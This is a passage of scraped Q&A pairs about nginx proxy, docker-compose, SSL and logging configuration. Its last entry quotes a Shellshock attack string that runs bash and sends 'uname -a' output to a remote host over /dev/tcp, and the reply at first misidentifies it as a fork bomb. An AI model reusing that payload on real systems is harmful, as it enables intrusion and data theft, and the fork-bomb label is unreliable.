proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}I am not sure what I am doing wrong. Please push me in the right direction. | .Net Core 3.0 Nginx not serving static files |
You may considerforeverorsupervisor.Checkthisblog post on the same. | I have a react + node app which I need to deploy. I am using nginx to serve my front end but I am not sure what to use to keep my nodejs server running in production.The project is hosted on a windows VM. I cannot use pm2 due to license issues. I have no idea if running the server using nodemon in production is good or not. I have never deployed an app in production, hence I have no idea about appropriate methods. | Running NodeJS server in production |
The docker compose documentation specifies thatlinksis deprecated and should be replaced withdepends_on.It does not. The docs only say, thatlinksalso express dependency between services in the same way asdepends_on, so they determine the order of service startup.I fail to see how this concludes, that you should usedepends_oninstead oflinks. Instead, it says, that if you need to run something in a container from the other container, you should usedepends_on, notlinks. (For example, youcommand-specify running migrations inphpcontainer and need to wait forpostgrescontainer).On the other hand,linkshas a warning sayingUnless you absolutely need to continue using it, we recommend that you use user-defined networks to facilitate communication between two containers instead of using--link.In this context,--linkfordockercli is the same thing aslinksindocker-compose.yml.Now, to the point, if you have your containers on one network, you do not need any further special specification. Unless you specify otherwise, the default network driver isbridge. So, if you specify yourdocker-compose.ymlas following, you should have all your container on one network and aware of each other automatically.version: "3.1"
services:
nginx:
image: nginx:alpine
ports:
- "8000:80"
volumes:
- ./php/content:/srv/www/content
- ./static:/srv/www/static
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
nodejs:
image: node:alpine
environment:
NODE_ENV: production
working_dir: /home/app
restart: always
volumes:
- ./nodejs:/home/app
command: ["node", "index"]
php:
image: php:apache
volumes:
- ./php:/var/www/htmlIn this casenginxshould work withlocation / {
try_files $uri nodejs;
}andlocation /api {
rewrite ^([^.\?]*[^/])$ $1/ break;
proxy_pass http://php:80;
} | Thedocker compose documentationspecifies thatlinksis deprecated and should be replaced withdepends_on. I can't figure exactly how.Here is the working docker-compose file (withlinksinstructions) of an application which has 3 services:a nginx reverse proxya nodejs appa php apiversion: "3.1"
services:
nginx:
image: nginx:alpine
ports:
- "8000:80"
volumes:
- ./php/content:/srv/www/content
- ./static:/srv/www/static
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
links:
- php:php-app
- nodejs:nodejs-app
nodejs:
image: node:alpine
environment:
NODE_ENV: production
working_dir: /home/app
restart: always
volumes:
- ./nodejs:/home/app
links:
- php:php-app
command: ["node", "index"]
php:
image: php:apache
volumes:
- ./php:/var/www/htmlThe related nginxdefault.conf:server {
listen 80;
root /srv/www;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
location / {
try_files $uri @nodejs;
}
location /api {
rewrite ^([^.\?]*[^/])$ $1/ break;
proxy_pass http://php-app:80;
}
location @nodejs {
proxy_pass http://nodejs-app:8080;
}
}Thelinksinstructions make aliases from the docker service names to theproxy_passnames in the nginx conf.How is it possible to replace thelinksinstructions in the docker-compose file withdepends_onwithout modifying the nginx config (and keep the aliases)? | how to replace `links` with `depends_on` in a docker-compose file? |
The nginx.conf code you have is a bit confusing and incomplete, because you don't actually show any code that does the actual serving ofhttps, so, it's unclear how the whole setup would be working at all.Theproxy_redirectshould generally be left at its default value ofdefault, unless you specifically know what you want to change it to; see the documentation athttp://nginx.org/r/proxy_redirect.The conditional redirect, e.g.,if ( $http_x_forwarded_proto != 'https' ) {return 307 https://$host$request_uri;}, would normally only be needed on your backend; it's unclear why you'd have this in your nginx, unless you have another nginx in front of it, which would be kinda redundant and likely unnecessary.Finally, your main concern is thatHTTP Status Codesmay be returned without status"names". First of all,status code "names", likeMoved Temporarilyafter302, orCreatedafter201, aren't really essential to anything, so, even in the unlikely event that they're missing — it's not very clear why'd they be missing with nginx in the first place, and you provided no further details to enable the troubleshooting — it shouldn't really affect any other functionality anyways (but, again, there's no proof that it's nginx that causes them to be missing, and, in fact, nginx does define"201 Created"in thengx_http_status_linesarray of strings withinsrc/http/ngx_http_header_filter_module.c).However, a related issue regardingHTTP Status Codescame up in the mailing lists recently —"Re: prevent nginx from translate 303 responses (see other) to 302 (temporary redirect)"— and it was pointed out that putting nginx in front of your backend may by default cause a change of HTTP/1.1 scheme to HTTP/1.0, as perhttp://nginx.org/r/proxy_http_version, which may cause your non-nginx backend to have different handling ofHTTP to comply with the 1.0 spec; solution would be to addproxy_http_version 1.1to nginx. | I'm using Nginx toredirect all HTTP requests to HTTPSin my spring boot application.This is the nginx configuration that i'm using,with that i was able to redirect all requests to Https but when i do it i get thestatus codereturned correctly but it doesnt have thestatus code nameanymore.if i remove nginx and run spring boot application alone i can get the http status with itscode name and code.server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _ ;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
if ( $http_x_forwarded_proto != 'https' ) {
return 307 https://$host$request_uri;
}
location / {
proxy_set_header X-Forwarded-Proto http;
proxy_pass http://localhost:7070;
expires -1;
}
}what am i doing wrong in here should i useproxy_redirectinstead ofproxy_pass, or am i missing anything in here.that'd be great if you can help. | HTTP status code names are missing when using Nginx |
In order for the backend application serverhttps://example.comto generate 304 responses it will need to see theIf-Modified-Sincerequest header. In your case that header is getting to nginx but not to the application server. You need to tell nginx to pass it through. Add the following to your location block:proxy_set_header If-Modified-Since $http_if_modified_since;Removeif_modified_since beforeandadd_header Last-modified. Those lines are not helpful becauseLast-Modifiedneeds to be generated by the application server, rather than by your nginx proxy.It may be possible for the nginx proxy to take charge of whether to send 304, by unconditionally querying the application server (and doing all the work entailed in generating a response) and then deciding whether to send 304, rather than passing on the full response (probably code 200), based on theLast-Modifiedheader in that response, but I can't see any benefit from doing it that way.The answers given toanother questionhelped me to realise how little the nginx proxy knows about the freshness of dynamic content that it is proxying. | I have a server running nginx that serves a web application built with ratpack and I can not manage to get the 304 response from when requesting the website from a browser or with curl.Nginx conf:location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_read_timeout 240;
proxy_pass http://example.com/;
proxy_redirect off;
add_header Last-modified "Wed, 29 Nov 2017 12:56:25";
if_modified_since before;
}From the browser I always get 200 ok and with curl i getHTTP/1.1 302 Found
Server: nginx/1.6.3
Date: Wed, 29 Nov 2017 14:23:07 GMT
Content-Length: 0
Connection: keep-alive
location: http://example.com/display
Last-Modified: Wed, 29 Nov 2017 12:56:25I have tried this two curl commands and both give the above response:curl -I -H "If-Modified-Since: Wed, 29 Nov 2017 14:27:08" -X GET
https://example.com
curl -I -H "If-Modified-Since: Wed, 29 Nov 2017 14:27:08"
https://example.comWhy am I getting 302 with curl and 200 ok in the browser?
What am I doing wrong? I can see that the browser is making its request with the "If-Modified-Since" header. When I reload the page resources are loaded from the browser cache, and with a hard reload all resources get a 200 ok. | Nginx does not return 304 for "if-modified-since" header |
Note that this is spelled out in thedocumentation:Times of several responses are separated by commas and colons like addresses in the $upstream_addr variable.This means that it made multiple requests to a backend, most likely you either have a bareproxy_passhost that resolves to different IPs (frequently the case with something like Amazon ELB as an origin), are you have a configuredupstreamthat has multiple servers. Unless disabled, theproxymodule will make round robin attempts against all healthy backends. This can be configured fromproxy_next_upstream_*directives.For example if this is not the desired behavior, you can just do:proxy_next_upstream off; | Sometimes Nginx $upstream_response_time returns 2 values.xxx.xxx.xxx.xxx - - [08/Nov/2017:23:43:25 +0900] "GET /xxxxxxxxxxxx HTTP/2.0" 200 284 "https://xxxxxxxxxxx" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" "0.015" "0.001, 0.014""0.001, 0.014" this is a $upstream_response_time.
Why does this has two values?Log format:log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for" '
'"$request_time" "$upstream_response_time"'; | Q: Nginx $upstream_response_time returns 2 values |
This worked for me when I ran into this issue:location / {
#...
try_files $uri $uri/ /index.html$is_args$args;
#...
}However, I've encountered errors in other projects using*.ejstemplates for development builds, and*.htmlplugins for production builds with webpack. The answer to which I found here:React-router issue when refreshing URLs with SSL EnabledHope that helps. | This question already has answers here:React Router BrowserRouter leads to "404 Not Found - nginx " error when going to subpage directly without through a home-page click(6 answers)Closed6 years ago.I have a react frontend app that uses react-router to create different routes. On development server its working fine but when I build the project it gives me 404 while accessing it with different routes directly. Website perfectly opens withxyz.net. And it gives 404 when I try to access it withxyz.net/login.Here is my nginx confserver {
listen 80;
server_name xyz.net www.xyz.net;
root /root/frontend/react/build/;
index index.html;
location /api/ {
include proxy_params;
proxy_pass http://localhost:8000/;
}} | Getting 404 with react router app with nginx [duplicate] |
The URL that you're using for the client is incorrect:var socket = io('http://127.0.0.1/socket.io/');Adding a path (in this case,/socket.io/) has a special meaning in connection strings: it reflects thenamespacethat you want the client to connect to.Since you're not using namespaces, you should leave it off:var socket = io('http://127.0.0.1/');
// Or possibly even just this:
// var socket = io(); | I have a nicely working django website which is being served by gunicorn and nginx(as a proxy server), now i want to add chat mechanism in that website using socket.io and nodejs. The problem is that the chat works perfectly fine when i connect socketio directly to nodejs server(which is listening on port 5000) but when i try to use nginx to proxy the socketio request to nodejs it doesn't work.Here is my nginx file in /sites-enabled/ dirserver {
listen 80;
server_name 127.0.0.1;
location = /favicon.ico {
access_log off;
log_not_found off;
}
location /static/ {
root /path/to/static;
}
location / {
include proxy_params;
proxy_pass http://unix:/path/to/file.sock;
}
location /socket.io/ {
proxy_pass http://127.0.0.1:5000;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
}
}BTW I am using pm2 to manage nodejs (if it makes any difference).EDIT:server.js:
var io = require('socket.io').listen(5000);
var fs = require('fs');
io.on('connection', function(socket){
console.log('connected');
socket.on('question', function(data){
console.log(data);
soc.emit('question', data);
});
socket.on('advice', function(data){
console.log(data);
soc.emit('advice', data);
});
socket.on('disconnect', function(){
console.log('disconnected');
});
});
client.js
var socket = io('http://127.0.0.1/socket.io/');
socket.on('question', function(data){
console.log(data);
});
socket.on('advice', function(data){
console.log(data);
});
$('#send').click(function() {
var msg = $('#msg').val();
if (msg == '') {$('#msg').focus();}
else{
data = {msg:msg};
socket.emit('question', data);
var msg = $('#msg').val('').focus();
}
}); | Socket.io not working with nginx |
I figured out the solution that involves below steps:Serve static login page using NginxForward the login credentials to the NodeJS server where authentication is handled and auth-token is stored in the response cookie (http-only). Send this response with the cookie set to the clientOnce the client receives authentication message, on success request the secure webapp page. This request will carry the auth-cookie along with itself.Again forward the request to the NodeJS server from Nginx, validate the token, setX-Accel-Redirectheader with the path where to look for the secure file on NodeJS server.While using X-Accel-Redirect, special care needs to be taken for Mime-Type of the response.CSS needs to be served with text/cssimages needs to be served with images/jpegHTML content should be served with text/html | Context:I'm trying to build a webapp with Nginx acting as the front end server and also as a proxy to my NodeJS server in the backend. I want to restrict access to the functional part of the webapp via proper authentication mechanism. The authentication logic is handled by NodeJS server and uses JWTs to handle the same.Current flow:The static login page is shown to the user which is being served by Nginx.User credentials are sent to the Nginx server which is forwarded to the NodeJS server which handles the login logic and on successful authentication sends back a JWT token. (All www.baseurl.com/api requests are being forwarded to NodeJS server)The JWT is stored in localStorage of the client browser (recommendation by Auth0 team) and then I want to redirect the user to the functional webapp page (say /home).For redirect, I am requesting access to /api/home page to Nginx server with my JWT token. This request is forwarded to NodeJS for validation of the token. Once validated I need to serve the webapp functional home page which is mixture of .html, .css, .js files.Since the page in itself is first rendered static and then it makes ajax requests to load further content, I want to serve this home page from my Nginx server rather than sending the whole HTML string from Node JS server. And once the static page is loaded on the client machine I want to start making requests to Node server requesting further page contents depending on permissions of the user.Problem statement:How can I achieve the same using Node and Nginx? How can Nginx know that NodeJS has validated the user token in step 4 and then serve the static part of the home page?Is this even possible? What is the best recommended way to handle such cases of authentication flow?PS:I'm using ExpressJS framework on server side, and plain html/css/js for client side (No client side web frameworks). | Serving static content using Nginx after successful NodeJS authentication |
I recommend to trylog_formatdirective with$realpath_root(or$document_root) and$request_filenameattribute.Read this documentations and customize Your logs as You wish:http://nginx.org/en/docs/http/ngx_http_log_module.html#log_formathttp://nginx.org/en/docs/http/ngx_http_core_module.html#variableshttps://www.digitalocean.com/community/tutorials/how-to-configure-logging-and-log-rotation-in-nginx-on-an-ubuntu-vps | Right now I've got Nginx setup to serve what I'm pretty sure is a valid filepath. However, it's giving me a 404 not found.I've looked in/var/log/nginx/access.logand it shows me:[05/Oct/2016:19:15:50 -0500] "GET /menu.html HTTP/1.1" 404 571 "-" "Mozilla/5.0 ....But not what path it was trying to access on localhost, which should be/usr/share/nginx/html/menu.html. How do I configure Nginx to show me this information? | How do I see the actual filepath that nginx is trying to access for a file? |
It is usual to placeinclude mime.types;inside the outerhttp { ... }block, rather than inside alocation { ... }block, so that it is system-wide and inherited by allserver { ... }blocks and all locations.Yourhref="../static/css/statement is relative, so from the information you provide, we cannot tell whether the URI is being processed by thelocation /static/block or thelocation /block.You do not have aroot(oralias) defined for thelocation /block, so the false condition of theif (!-f $request_filename)statement will probably always fail with 404.You may want to setroot /var/www/test/my-examplein theserver { ... }block and allow it to be inherited by somelocationblocks. The use ofaliaswhere arootcan be used is discouraged - seethis document.If your CSS files are being served through theproxy_pass http://test_server;then this is the wrong place to be fixing the MIME type. | I use nginx, I have include mime.types and I keep having error when I try access my css files. I tried insert "include /etc/nginx/mime.types;" in "location /" but didn't works.This is my nginx.conf:user www-data;
worker_processes 4;
pid /run/nginx.pid;
events {
worker_connections 768;
# multi_accept on;
}
http {
server_names_hash_bucket_size 64;
upstream test_server {
server unix:/var/www/test/run/gunicorn.sock fail_timeout=10s;
}
server {
listen 80;
server_name ec2-#-#-#-#.sa-east-1.compute.amazonaws.com;
client_max_body_size 4G;
access_log /var/www/test/logs/nginx-access.log;
error_log /var/www/test/logs/nginx-error.log warn;
location /static/ {
autoindex on;
alias /var/www/test/my-example/static/;
include /etc/nginx/mime.types;
}
location /media/ {
autoindex on;
alias /var/www/test/my-example/media/;
}
location / {
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_redirect off;
if (!-f $request_filename) {
proxy_pass http://test_server;
break;
}
}
#For favicon
location /favicon.ico {
alias /var/www/test/test/static/img/favicon.ico;
}
#For robots.txt
location /robots.txt {
alias /var/www/test/test/static/robots.txt ;
}
# Error pages
error_page 500 502 503 504 /500.html;
location = /500.html {
root /var/www/test/my-example/static/;
}
}
}And head of my html:
But I keep having this error:was not loaded because its MIME type, "text/plain", is not "text/css" | CSS was not loaded because its MIME type |
I found the solution! The regular expression works, but you need to add a resolver in order to have a variable in the proxy_pass (at least, that's how I understand it).server {
listen 80;
server_name ~^(?[0-9]*).example.com$;
location / {
resolver 10.33.1.1; #/etc/resolv.conf
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host;
proxy_http_version 1.1;
proxy_pass http://example.com:$port_subdomain;
}
} | I'm trying to use nginx to redirect to ports (running nodeJS apps) based on the domain prefix. So far, I can redirectexample.com:80 --> port 85025555.example.com:80 --> port 55556666.example.com:80 --> port 6666Is there a way to do this kind of redirection without having to copy-paste this over and over??server {
listen 80;
server_name 5555.example.com;
location / {
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host;
proxy_http_version 1.1;
proxy_pass http://example.com:5555;
}
}I figured I should do this with regular expressions, so I tried the following, but without any success :~^(?.+)\.example\.com$ #then changed proxy_pass to http://example.com:$theport
~^([0-9]+)\.example\.com$ #then changed proxy_pass to http://example.com:$1
server_name "~^([0-9]{4})\.example\.com$";
set $theport $1; #then changed proxy_pass to http://example.com:$theportIn all cases, I'm getting a "502 Bad Gateway" error. | nginx : redirect to port according to domain prefix (dynamically) |
More simple way is hookconsole.logand callconsole.logas usually.var util = require('util');
var JFile = require("jfile");
var nxFile = new JFile('/var/log/nginx/access.log');
...
process.stdout.write = (function(write) {
return function(text, encoding, fd) {
write.apply(process.stdout, arguments); // write to console
nxFile.text += util.format.apply(process.stdout, arguments) + '\n'; // write to nginx
}
})(process.stdout.write);Also you can define hook toconsole.errorby changestdouttostrerrin code above.P.S. I don't have nginx to verify code. So code can contains errors :) | I have an Node.js app setting up with systemd. The app running behind NGINX.I would like to add console output of my Node.js application in the log access NGINX file ?How can I do this ?Thanks in advance. | How to add console outputs Node.js app in the log access NGINX file? |
No - you cannot do this at the Django level. The contents ofHttpRequest.METAareobtained directly from the WSGI handler. The structure of this object is defined in theWSGI specification.The request headers are adicteven before Django gets anywhere near them - your WSGI handler (uwsgi/gunicorn/weurkzeug in development) is what parses the headers and passes thedictto your Django application. Django has no knowledge of the original, raw, request headers.The only place to get the raw request would be at web server (Nginx/Apache etc) level. I know you can log these with Nginx - although you would be logging a substantial amount of data. | Is there any way to get the full unprocessed HTTP request headers in django (hosted on elastic beanstalk?)I would like to be able to analyze the ordering of the headers in particular, so unfortunatelyHttpRequest.METAdoes not suffice for my use case. | Get raw request headers in django |
from:https://forum.nginx.org/read.php?2,1680,248005#msg-248005This is not a problem to solve, it's just information messages logged
by nginx. If it's too verbose for you, consider tuning error_log
logging level, seehttp://nginx.org/r/error_log.-- Maxim Douninhttp://nginx.org/although for my 2 cents, I'm not sure closing a HTTP/1.1 connection should be "info", more like "debug".The "in pairs" would be your browser making more than one connection to your server (as is normal). You can verify the number of connections with the developer tools on your browser (under network).Cameron | Invar/log/nginx/https-error_logandvar/log/nginx/http-error_log, I see tens of millions of errors (aggregated over the past several months):client xx.xx.xxx.xxx closed keepalive connectionFrequently (but not always) they exist in pairs with the same IP address and timestamp even, e.g.:2016/07/12 19:24:59 [info] 44815#0: *82924 client 82.145.210.66 closed keepalive connection
2016/07/12 19:24:59 [info] 44821#0: *83275 client 82.145.210.66 closed keepalive connectionI.e. it seems the same person closed the connection twice at the same point in time? I feel something untoward is going on here. I'm using nginx as a reverse proxy in front of gunicorn (it's a Django app). Can anyone with expertise help me troubleshoot this issue, or speculate what it could be? Alternatively, is it something I shouldn't worry about? | keep alive errors seen in nginx logs |
There are only a limited number of directives that are allowed within anifcontext innginx. This is related to the fact thatifis part of therewritemodule; as such, within its context, you can only use the directives that are specifically outlined within the documentation of the module.The common way around this "limitation" is to build up state using intermediate variables, and then use directives likeproxy_set_headerusing such intermediate variables:set $xci $http_x_client_id;
if ($cookie_header_x_client_id) {
set $xci $cookie_header_x_client_id;
}
proxy_set_header x-client-id $xci; | Is there a way to check if a specific cookie exist innginx?For now I have a section like below to set header from cookie:proxy_set_header x-client-id $cookie_header_x_client_id;I want to check if that cookie exist then set the header, otherwise do not override header.I've tried:if ($cookie_header_x_client_id) {
proxy_set_header x-client-id $cookie_header_x_client_id;
}But it does not work and gives the error below:"proxy_set_header" directive is not allowed here in /etc/nginx/sites-enabled/website:45Any solution? | How to conditionally override a header in nginx only if a cookie exist? |
The problem is a fundamental misunderstanding as tohownginxprocesses a request. Basically,nginxchooses one location to process a request.You wantnginxto process URIs that begin with/adminin a location block that requiresauth_basic. In addition, URIs that end with.phpneed to be sent to PHP7.So you need two fastcgi blocks, one to process normal PHP files and one to process restricted PHP files.There are several forms oflocationdirective. You have already discovered that the regex locations are ordered and therefore yourlocation "~^/admin/.*$"block effectively prevents thelocation ~ \.php$block from seeing any URI beginning with/adminand ending with.php.A clean solution would be to use nested location blocks and employ the^~modifier which forces a prefix location to take precedence over a regex location:location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
try_files $uri =404;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
}
location ^~ /admin/ {
auth_basic "Restricted";
auth_basic_user_file /etc/nginx/.htpasswd;
try_files $uri $uri/ =404;
location ~ \.php$ {
try_files $uri =404;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
}
}Note thatlocation ^~is a prefix location and not a regex location.Note also that thefastcgi_split_path_infoandfastcgi_indexdirectives are not required in alocation ~ \.php$block. | In aprevious question,I was trying to password protect my /admin/ and sub-folders directory using Nginx with .htpasswd and regex.That was done successfully, but now, after password authentication was completed, Nginx prompts to "download" php files, rather than simply loading them.This doesn't happen when the new location "authentication" block is commented out. For instance, in this code sample, PHP pages load without any issue:location / {
try_files $uri $uri/ =404;
}
#location "~^/admin/.*$" {
# try_files $uri $uri/ =404;
# auth_basic "Restricted";
# auth_basic_user_file /etc/nginx/.htpasswd;
#}
location ~ \.php$ {
try_files $uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)$;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}How can I resolve these (apparently conflicting) location blocks, so the /admin/ section is password protected yet php files still load? | Nginx sucessfully password protects PHP files, but then prompts you to download them |
You could try andchange nginx log levelwith a:access_log off;The goal remains to modify thenginx.confused by the nginx image. | I'm running nginx and unicorn in a docker container managed by supervisord.So, supervisord is the docker command. It in turn spawns nginx and unicorn. Unicorn talks to nginx over a socket. nginx listens on port 80.I also have a logspout docker container running, basically piping all the docker logs to papertrail by listening to docker.sock.The problem is nginx is constantly spewing thousands of mundane entries to the logs:172.31.45.231 - - [25/May/2016:05:53:33 +0000] "GET / HTTP/1.0" 200 12961 0.0090I'm trying to disable it.So far I've:setaccess_logs /dev/null;innginx.confand vhost files.tried to tell supervisord to stop logging the requests[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=/dev/null
stderr_logfile=/dev/nulltried to tell supervisord to send the logs to syslog not stdout:[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=syslog
stderr_logfile=syslogSet log level in Unicorn to Warn in the rails code, and via env var.Full supervisord conf:[supervisord]
nodaemon=true
loglevel=warn
[program:unicorn]
command=bundle exec unicorn -c /railsapp/config/unicorn.rb
process_name=%(program_name)s_%(process_num)02d
numprocs=1
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
redirect_stderr=true
[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=/dev/null
stderr_logfile=/dev/null | how to stop dockerized nginx in foreground from flooding logs? |
logrotaterunning as a daily cron job will rename log files in/var/log/nginx/*.log.
After that, nginx cannot output error log or access log to original log files. (For more details, refer to @mata's comment under this answer.)To solve this problem,USR1signal should be sent to nginx to reopen log files.
That's whypostrotatesendsUSR1to nginx master, this signal is not to kill nginx.For more details to control nginx with signals, seethis document. | In/etc/logrotate.d/nginxI find:/var/log/nginx/*.log {
daily
missingok
rotate 52
compress
delaycompress
notifempty
create 640 nginx adm
sharedscripts
postrotate
[ -f /var/run/nginx.pid ] && kill -USR1 `cat /var/run/nginx.pid`
endscript
}It's thepostrotatecommand I'm curious about.I take this to mean that once the log has been successfully rotated, it kills thenginxprocess.I know when restartingnginxthe new log will be created.What I can't work out is, how is the process automatically restarted, and is there any interruption to serving webpages? | How does Nginx restart after being killed by log-rotate? |
1) For strong Diffie-Hellman and avoid Logjam attacks seethis great manual.You need extend your nginx config with these directives (after you will generate dhparams.pem file):ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
ssl_prefer_server_ciphers on;
ssl_dhparam /etc/nginx/ssl/dhparams.pem;2) For correct certificate chain use fullchain.pem, not cert.pem, seethis great tutorialfor details.And you will get A grade :)3) and as bonus try this great service:"Generate Mozilla Security Recommended Web Server Configuration Files". | I've usedletsencryptto install an SSL cert for the latest nginx on ubuntu.
The setup is fine and works great with the exception of:I don't know enough about SSL to know what's going on but I have a suspicion:
I installed the SSL cert for Apache a while back and just now moved to Nginx for it's http/2 support. As the nginx plugin is not stable yet I had to install the cert myself and this is what I did:In my nginx config (/etc/nginx/conf/default.conf) I added:server {
listen 80;
server_name [domain];
return 301 https://$host$request_uri;
}
server {
listen 443 http2;
listen [::]:443 http2;
server_name [domain];
ssl on;
ssl_certificate /etc/letsencrypt/live/[domain]/cert.pem;
ssl_certificate_key /etc/letsencrypt/live/[domain]/privkey.pem;
}Is it possible that this breaks the chain somehow? What is the proper way here?Thanks guys | How to install a letsencrypt cert with nginx? |
The$http_hostparameter is set to the value of theHostrequest header.nginxuses that value to select aserverblock. If aserverblock is not found, the default server is used, which is either marked asdefault_serveror is the firstserverblock encountered. Seethis documentation.To forcenginxto only accept named requests, use acatch allserver block to reject anything else, for example:server {
listen 80 default_server;
return 403;
}
server {
listen 80;
server_name www.example.com;
...
}With the SSL protocol, it depends on whether or not you haveSNIenabled. If you are not using SNI, then all SSL requests pass through the sameserverblock, in which case you will need to use anifdirective to test the value of the$http_hostvalue. Seethisandthisfor details. | Is it possible to allow only users typing in xxxxxx.com (fictive), so they should make a DNS-lookup and connect. And block users who uses my public ip to connect ?Configuration:server {
listen 80;
return 301 https://$host$request_uri;
}
server {
listen 443;
server_name xxxxxxx.com;
ssl_certificate /etc/nginx/ssl/server.crt;
ssl_certificate_key /etc/nginx/ssl/server.key;
ssl on;
ssl_session_cache builtin:1000 shared:SSL:10m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/jenkins.access.log;
location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# Fix the “It appears that your reverse proxy set up is broken" error.
proxy_pass http://10.0.11.32:80;
proxy_read_tenter code hereimeout 360;
proxy_redirect http://10.0.11.32:80 https://xxxxxxx.com;
}
} | Nginx reverse proxy, only allow connection from hostname not ip |
To do this you needtransparentparameter of Nginx proxy_bind directive which is available on Nginx Plus R10 or Nginx 1.11.2+. Also you need to configure routing table and firewall for IP transparency andtcfor direct server response. A working example is fully described here:https://www.nginx.com/blog/ip-transparency-direct-server-return-nginx-plus-transparent-proxy/ | Is there a way to configure Nginx to work as a Direct Server Return (DSR) load balancer similar to this:http://blog.haproxy.com/2011/07/29/layer-4-load-balancing-direct-server-return-mode/ | Can Nginx work as Direct Server Return load balancer? |
If you docker is a linux emulation, you can use nano.$ nano file.txtIf you only want to read the file, but not edit it, you can do this:$ less file.txt | I have run 3 docker containers on one server.One - with nginx, two - with node apps.I can enter inside nginx container using exec command, but I want to look through the hosts file in etc. Is there any ability to do this?UpdateThere is only cat util. You can call it ascat your_filename | Is there any text editor inside docker container? |
Rotate the log files. On OS X,newsyslogis the preferred utility to do that. Set up a file like this in/etc/newsyslog.d/nginx.conf:# logfilename [owner:group] mode count size when flags [/pid_file] [sig_num]
/var/log/nginx.log deceze:wheel 644 2 1024 * JReadhttps://www.newsyslog.org/manual.htmlfor more information. | Nginx occupies all the available disk space. How to set limit for log files on Mac OS? | How to set limit for Nginx log files on Mac OS? |
This looks like an attemptedfork bomb:() { :;};Fortunately, if your server is still running after that gets sent it means it is being sanitised or ignored.As @TheGreatContini points out this isactually an attempted Shellshock attack. Which makes my answer a little unsafe. Its worth making sure your server is fully patched and up-to-date, and check any outgoing traffic to make sure you weren't impacted. | I've setup django to alert me through email when any request fails and I'm constantly receiving this email:Referrer: () { :;}; /bin/bash -c "echo <>/cgi-bin/index.cgi > /dev/tcp/<>/21; /bin/uname -a > /dev/tcp/<>/21; echo <>/cgi-bin/index.cgi > /dev/udp/<>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <>/cgi-bin/index.cgi > /dev/tcp/<>/21; /bin/uname -a > /dev/tcp/<>/21; echo <>/cgi-bin/index.cgi > /dev/udp/<>/21"
